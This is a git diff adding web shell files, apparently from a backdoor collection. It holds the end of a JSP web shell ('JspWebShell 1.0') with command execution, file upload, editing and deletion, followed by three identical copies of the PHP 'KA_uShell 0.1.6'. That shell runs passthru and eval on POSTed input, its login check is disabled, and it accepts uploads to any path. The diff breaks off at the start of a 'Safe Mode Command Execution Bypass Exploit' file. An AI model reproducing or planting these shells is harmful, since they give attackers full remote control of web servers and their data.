+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAĞéÄâ»úÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAĞéÄâ»ú˵Ã÷ÊéÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
+          </tr>
+		  <%
+		  	float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
+			float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
+			float fPercent=fFreeMemory/fTotalMemory*100;
+		  %>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVAĞéÄâ»úÊ£ÓàÄڴ棺</td>
+            <td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M 
+            </td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVAĞéÄâ»ú·ÖÅäÄÚ´æ</td>
+            <td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M 
+            </td>
+          </tr>
+        </table>
+		  <table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;²ÎÊıÃû³Æ</td>
+            <td width="70%" height="22">&nbsp;²ÎÊı·¾¶</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.class.path </td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>	
+            </td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.home</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.endorsed.dirs</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.library.path</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%> 
+            </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.io.tmpdir</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+  <div id="testspeed" align="center"> </div>
+</CENTER></div>
+
+<%}
+else{
+if (editfile!=null)//if edit
+{
+%>
+<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1"> 
+  <table width="99%" height="232" border="0">
+    <tr> 
+      <td height="226"><form name="form2" method="post" action="">
+          <p align="center"> µØÖ·£º
+            <input name="editfile" type="text" value="<%=editfile%>" size="50">
+          </p>
+          <p align="center"> 
+            <textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
+            <input type="submit" name="Submit2" value="±£´æ">
+          </p>
+        </form> </td>
+    </tr>
+  </table>
+  <p>&nbsp;</p></div>
+<%}
+else{%>
+
+<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
+  <tr bgcolor="#333333"> 
+    <td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell 
+      version 1.0</font><font color="#FFFFFF">(ÍøվĿ¼:<%=config.getServletContext().getRealPath("/")%>)</font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td colspan="4"> <font color="#000000"> 
+      <%
+	  File[] fs = File.listRoots();
+	  for (int i = 0; i < fs.length; i++){
+	  %>
+      <a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">±¾µØ´ÅÅÌ(<%=fs[i].getPath()%>) 
+      </a> 
+      <%}%>
+      </font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td height="10" colspan="4"> <font color="#000000"> 
+      <form name="form1" method="post" action="">
+        <input type="text" name="command" class="button">
+        <input type="submit" name="Submit" value="CMDÃüÁîÖ´ĞĞ" class="button">
+      </form>
+      </font> <p> 
+        <%
+		String cmd = "";
+		InputStream ins = null;
+		String result = "";		
+		if (request.getParameter("command") != null) {		
+			cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
+        <%=result == "" ? "&nbsp;" : result%> 
+        <%}%>
+       </td>
+  </tr>
+  <FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
+    <tr bgcolor="#999999"> 
+      <td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150"  SIZE="50" class="button"> 
+        <INPUT TYPE="SUBMIT" VALUE="ÉÏ´«" class="button"> </td>
+      <td colspan="2"><a href="?jsptz=true" target="_blank">JSP̽Õë</a> </td>
+    </tr>
+  </FORM>
+  <%     String fileexe="";
+             String dir="";
+             String deldir=""; 
+			 String scrfile="";
+			 String dstfile="";
+			  fileexe=request.getParameter("fileexe");
+		     dir=request.getParameter("dir");
+			 deldir=request.getParameter("deldir");
+		     scrfile=request.getParameter("scrfile");
+			 dstfile=request.getParameter("dstfile");
+		  if (fileexe!=null)
+			{
+			//out.print(path+fileexe);
+			createFile(path+fileexe); 
+			}
+		  if (dir!=null)
+			{
+			//out.print(path+dir);
+			createFolder(path+dir); 
+			}
+		  if (deldir!=null)
+			{
+			//out.print(deldir);
+		    DeleteFolder(deldir); 
+			}
+			if (scrfile!=null&dstfile!=null)
+			{
+			//out.print(scrfile);
+			//out.print(dstfile);
+			copyfinish=fileCopy(scrfile, dstfile) ;
+			}
+			%>
+  <tr bgcolor="#CCCCCC"> 
+    <td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
+        Îļş¼ĞÃû£º 
+        <input name="dir" type="text" size="10" class="button">
+        <input type="submit" name="Submit3" value="н¨Ä¿Â¼" class="button">
+      </form></td>
+    <td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
+        ÎļşÃû£º 
+        <input name="fileexe" type="text" size="8" class="button">
+        <input type="submit" name="Submit4" value="н¨Îļş" class="button">
+      </form></td>
+    <td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
+        Îļş<input name="scrfile" type="text" size="15"class="button">
+        ¸´ÖƵ½
+        <input name="dstfile" type="text" size="15" class="button">
+        <input type="submit" name="Submit5" value="¸´ÖÆ" class="button">
+      </form><font color="#FF0000"><%if(copyfinish==true) out.print("¸´ÖƳɹ¦");%></font></td>
+  </tr>
+  <%//ÉÏ´«
+             String tempfilename="";
+             String up=request.getParameter("up");
+			// String tempfilepath=request.getParameter("filepath");
+			// out.print(tempfilepath);
+			  if(up!=null)
+		  {
+	       tempfilename=(String)session.getId();
+          //String tempfilename=request.getParameter("file");
+          File f1=new File(tempfilepath,tempfilename);
+          int n;
+          try
+          {
+              InputStream in=request.getInputStream();
+              BufferedInputStream my_in=new BufferedInputStream(in);
+              FileOutputStream fout=new FileOutputStream(f1);
+              BufferedOutputStream my_out=new BufferedOutputStream(fout);
+              byte[] b=new byte[10000];
+              while((n=my_in.read(b))!=-1)
+              {
+                   my_out.write(b,0,n);
+              }
+              my_out.flush();
+              my_out.close();
+              fout.close();
+              my_in.close();
+              in.close();
+             // out.print("Îļş´´½¨³É¹¦!<br>");
+          }
+          catch(IOException e)
+          {
+              out.print("Îļş´´½¨Ê§°Ü!");
+          }
+          
+          try
+          {   
+              RandomAccessFile random1=new RandomAccessFile(f1,"r");
+              random1.readLine();
+              String filename=random1.readLine();
+              byte[] b=filename.getBytes("ISO-8859-1");
+              filename=new String(b);
+              int pointer=filename.lastIndexOf('\\');
+              filename=filename.substring(pointer+1,filename.length()-1);
+              File f2=new File(tempfilepath,filename);
+              RandomAccessFile random2=new RandomAccessFile(f2,"rw");
+              random1.seek(0);
+              for(int i=1; i<=4; i++)
+              {
+                   String tempstr=random1.readLine();
+              }
+              long startPoint=random1.getFilePointer();
+              random1.seek(random1.length());
+              long mark=random1.getFilePointer();
+              int j=0;
+              long endPoint=0;
+              while((mark>=0)&&(j<=5))
+              {
+                   mark--;
+                   random1.seek(mark);
+                   n=random1.readByte();
+                   if(n=='\n')
+
+                   {
+                         j++;
+                         endPoint=random1.getFilePointer();
+                   }
+              }
+              long length=endPoint-startPoint+1;
+              int order=(int)(length/10000);
+              int left=(int)(length%10000);
+              byte[] c=new byte[10000];
+              random1.seek(startPoint);
+              for(int i=0; i<order; i++)
+              {
+                    random1.read(c);
+                    random2.write(c);
+              }
+              random1.read(c,0,left);
+              random2.write(c,0,left);
+              random1.close();
+              random2.close();
+              f1.delete();
+              out.print("ÎļşÉÏ´«³É¹¦!");
+          }
+          catch(Exception e)
+          {
+              out.print("ÎļşÉÏ´«Ê§°Ü!");
+          }
+
+		  }
+	
+  %>
+  <tr> 
+    <td width="196" height="48" valign="top" bgcolor="#999999"> 
+      <%  try {
+	//path=request.getParameter("path");
+		//if(path==null)
+		//path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isDirectory())
+		    {%>
+      <a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">ɾ³ı</a><br> 
+      <% }
+		
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("²»´æÔÚ»òûÓĞÈ¨ÏŞ");
+		}
+	%>
+      &nbsp; </td>
+    <td colspan="3" valign="top" bgcolor="#999999"> 
+      <%  try {
+	path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isFile())
+		    {//request.getContextPath()µÃµ½ĞéÄâ·¾¶%>
+     <%=fList[j].getName()%> 
+       <a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">±à¼</a> 
+      &nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">ɾ³ı</a><br> 
+      <% }
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("²»´æÔÚ»òûÓĞÈ¨ÏŞ");
+		}
+	%>
+    </td>
+  </tr>
+</table>
+<p align="center">Power By ¾ø¶ÔÁã¶È[B.C.T] QQ:48124012</p>
+<p align="center">&nbsp;</p>
+<%}//if edit
+}
+}
+%>
+</body>
+</html>
diff --git a/php/KA_uShell 0.1.6.php b/php/KA_uShell 0.1.6.php
new file mode 100644
index 0000000..933de04
--- /dev/null
+++ b/php/KA_uShell 0.1.6.php	
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ğàñêîäèğîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèğîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèğîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãğóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ğàçìåğ:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãğóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåğâåğ:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêğûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/php/KAdot Universal Shell v0.1.6.php b/php/KAdot Universal Shell v0.1.6.php
new file mode 100644
index 0000000..6150454
--- /dev/null
+++ b/php/KAdot Universal Shell v0.1.6.php	
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ğàñêîäèğîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèğîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèğîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãğóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ğàçìåğ:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãğóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåğâåğ:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêğûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/php/KAdot_Universal_Shell_v0.1.6.php b/php/KAdot_Universal_Shell_v0.1.6.php
new file mode 100644
index 0000000..69bdbbe
--- /dev/null
+++ b/php/KAdot_Universal_Shell_v0.1.6.php
@@ -0,0 +1,230 @@
+
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ğàñêîäèğîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèğîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèğîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãğóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ğàçìåğ:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãğóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåğâåğ:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêğûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
diff --git a/php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php b/php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php
new file mode 100644
index 0000000..06a3035
--- /dev/null
+++ b/php/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php	
@@ -0,0 +1,34 @@
+<?
+echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
+print_r('
+<pre>
+<form method="POST" action="">
+<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalıştır" type="submit">
+</form>
+<form method="POST" action="">
+<b><font color=blue>Hızlı Menü :=) :</font><select size="1" name="liz0">
